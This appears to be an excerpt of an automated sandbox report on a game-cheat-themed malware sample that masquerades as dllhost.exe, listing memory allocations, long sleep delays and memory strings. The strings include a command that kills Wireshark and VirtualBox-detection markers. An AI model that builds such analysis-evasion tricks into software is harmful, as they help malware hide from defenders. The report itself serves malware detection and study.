Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: cmd.exe, 0000001F.00000002.1763527076.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: H TASKKILL /F /IM WIRESHARK.EXE
Source: cmd.exe, 0000001F.00000002.1763527076.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CMD /C TASKKILL /F /IM WIRESHARK.EXE
Source: cmd.exe, 0000001F.00000002.1763527076.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSWOW64\CMD.EXECMD /C TASKKILL /F /IM WIRESHARK.EXEC:\PROGRAMDATA\DLLHOST.EXEWINSTA0\DEFAULT=::=::\ALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAFPS_BROWSER_APP_PROFILE_STRING=INTERNET EXPLORERFPS_BROWSER_USER_PROFILE_STRING=DEFAULTHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=X86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILES (X86)PROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=C:\PROGRAM FILES (X86)\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSESSIONNAME=CONSOLESYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWS+I
Source: cmd.exe, 0000001F.00000002.1763053184.0000000000790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSWOW64\TASKKILL.EXEXETASKKILL /F /IM WIRESHARK.EXE.TASKKILL /F /IM WIRESHARK.EXESWINSTA0\DEFAULT::==::=::\ALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMON FILES\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\SIDEBYSIDEIERSM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAFPS_BROWSER_APP_PROFILE_STRING=INTERNET EXPLORERFPS_BROWSER_USER_PROFILE_STRING=DEFAULTHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PRO\REGI\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\SIDEBYSIDEW6432=C:\PROB
Source: dllhost.exe, 00000002.00000002.3861286250.00000000004A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASKKILL /F /IM WIRESHARK.EXET\WC:\PROGRAMDATA\DLLHOST.EXEIWINSTA0\DEFAULTLEL=::=::\ALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\C
Source: cmd.exe, 0000001F.00000002.1763527076.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /F /IM WIRESHARK.EXE(I
Source: cmd.exe, 0000001F.00000002.1763053184.0000000000790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSWOW64\CMD.EXECMD /C TASKKILL /F /IM WIRESHARK.EXEC:\PROGRAMDATA\DLLHOST.EXEWINSTA0\DEFAULT
Source: cmd.exe, 0000001F.00000002.1765475915.0000000002C80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CMD/CTASKKILL/F/IMWIRESHARK.EXEROGRAM
Source: cmd.exe, 0000001F.00000002.1763527076.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKKILL /F /IM WIRESHARK.EXE2I
Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000002.00000002.3865755977.0000000002662000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000001A.00000002.2012435812.0000000002752000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000001A.00000002.2012435812.000000000274F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.1765475915.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.0000000002552000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.000000000254F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.000000000265F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.0000000002662000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: cmd.exe, 0000001F.00000002.1763527076.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CMD /C TASKKILL /F /IM WIRESHARK.EXECI

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Memory allocated: A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Memory allocated: A40000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 8E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 2650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 970000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 80D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 90D0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 92B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: A2B0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: A670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: B670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: C670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 90D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: A670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: B670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: C670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: B670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 90D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: A670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: B670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: C370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: D370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: C730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: D730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: E730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: F730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 10730000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 10EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 11EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 12EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 13EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 14EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 15EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 16EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 17EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 18EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 19EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 1AEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 1BEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 1CEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 1DEB0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: D730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: E730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 10730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 13EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 14EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 15EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 16EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Memory allocated: 910000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 2740000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: A60000 memory commit \| memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 9E0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 4510000 memory commit \| memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 9E0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 2540000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 4540000 memory commit \| memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 8D0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 2650000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 4650000 memory commit \| memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 8E0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: A40000 memory commit \| memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 8C0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 27B0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: C90000 memory commit \| memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 9C0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\ProgramData\dllhost.exe	Memory allocated: 46F0000 memory commit \| memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\dllhost.exe	Window / User API: threadDelayed 2146	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Window / User API: threadDelayed 427	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Window / User API: threadDelayed 1043	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Window / User API: foregroundWindowGot 883	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2922	Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe TID: 3772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe TID: 3772	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe TID: 3572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\dllhost.exe TID: 6320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\dllhost.exe TID: 5896	Thread sleep time: -1073000s >= -30000s	Jump to behavior
Source: C:\ProgramData\dllhost.exe TID: 5896	Thread sleep time: -521500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2352	Thread sleep count: 2922 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2340	Thread sleep count: 179 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\dllhost.exe TID: 2352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 2916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1984	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4708	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 3848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 3160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 3324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 5164	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 5628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 6080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 5392	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 4784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 6752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 2548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 5632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 5788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\dllhost.exe TID: 5544	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: dllhost.exe, 00000002.00000002.3889638801.000000000C731000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxServicex
Source: dllhost.exe, 0000002A.00000002.3335794048.0000000002A79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxServicedS\|l
